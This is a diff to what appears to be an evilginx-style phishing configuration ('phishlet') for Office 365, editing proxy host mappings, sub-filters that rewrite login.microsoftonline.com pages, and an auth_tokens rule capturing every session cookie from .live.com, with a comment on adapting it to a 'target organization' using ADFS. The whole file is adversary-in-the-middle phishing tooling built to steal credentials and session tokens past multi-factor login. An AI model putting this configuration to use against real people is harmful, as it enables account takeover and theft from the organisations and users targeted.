--- a/Phishlets/o365Business.yaml
+++ b/Phishlets/o365Business.yaml
@@ -8,9 +8,12 @@ proxy_hosts:
  # - { phish_sub: "outlook", orig_sub: "outlook", domain: "live.com", session: true, is_landing: false, auto_filter: true }
  # - {phish_sub: 'cdn', orig_sub: 'logincdn', domain: 'msauth.net', session: true, is_landing: false}
 
+# sub_filters:
+#   - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
+#   - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
+#   # Uncomment and fill in if your target organization utilizes ADFS
+  #- {triggers_on: '<insert-adfs-subdomain-and-host>', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
   
-sub_filters:
-#  - {triggers_on: 'breakdev.org', orig_sub: 'academy', domain: 'breakdev.org', search: 'something_to_look_for', replace: 'replace_it_with_this', mimes: ['text/html']}
 auth_tokens:
   - domain: '.live.com'
     keys: ['.*:regexp']
@@ -48,10 +51,3 @@ login:
   path: '/'
 auth_urls:
   - '/landingv2'
-# force_post:
-#   - path: '/oauth20_authorize(.+)'
-#     search:
-#       - {key: 'redirect_uri', search: '.*'}
-#     force:
-#       - {key: 'rredirect_ur;', value: 'https://www.office.com/landingv2'}
-#     type: 'get'
